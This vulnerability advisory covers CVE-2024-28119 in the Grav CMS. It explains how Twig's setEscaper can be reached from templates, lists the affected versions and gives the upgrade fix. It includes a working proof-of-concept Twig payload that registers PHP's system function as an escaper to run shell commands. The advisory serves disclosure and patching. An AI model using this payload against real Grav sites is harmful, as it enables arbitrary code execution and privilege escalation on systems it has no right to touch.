First published: Thu Mar 21 2024(Updated: )
### Summary Due to the unrestricted access to twig extension class from grav context, an attacker can redefine the escape function and execute arbitrary commands. ### Details https://github.com/twigphp/Twig/blob/3.x/src/Extension/EscaperExtension.php#L99 ```php /** * Defines a new escaper to be used via the escape filter. * * @param string $strategy The strategy name that should be used as a strategy in the escape call * @param callable $callable A valid PHP callable */ public function setEscaper($strategy, callable $callable) { $this->escapers[$strategy] = $callable; } ``` Twig supports the functionality to redefine the escape function through the setEscaper method. However, that method is not originally exposed to the twig environment, but it is accessible through the payload below. ```plaintext {{ grav.twig.twig.extensions.core.setEscaper('a','a') }} ``` At this point, it accepts callable type as an argument, but as there is no validation for the $callable variable, attackers can set dangerous functions like system as the escaper function. ### PoC ``` {{ var_dump(grav.twig.twig.extensions.core.setEscaper('system','twig_array_filter')) }} {{ var_dump(['id'] | escape('system', 'system')) }} ``` ### Impact Twig processing of static pages can be enabled in the front matter by any administrative user allowed to create or edit pages. As the Twig processor runs unsandboxed, this behavior can be used to gain arbitrary code execution and elevate privileges on the instance.
Credit: security-advisories@github.com security-advisories@github.com
Affected Software | Affected Version | How to fix |
---|---|---|
composer/getgrav/grav | <1.7.45 | 1.7.45 |
Getgrav | <1.7.45 |
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
The severity of CVE-2024-28119 is considered high due to the potential for arbitrary command execution.
To fix CVE-2024-28119, upgrade to version 1.7.45 or later of the Getgrav Grav package.
CVE-2024-28119 is caused by unrestricted access to the Twig extension class from the Grav context.
CVE-2024-28119 affects all versions of Getgrav Grav prior to 1.7.45.
CVE-2024-28119 is a code execution vulnerability that allows attackers to redefine the escape function.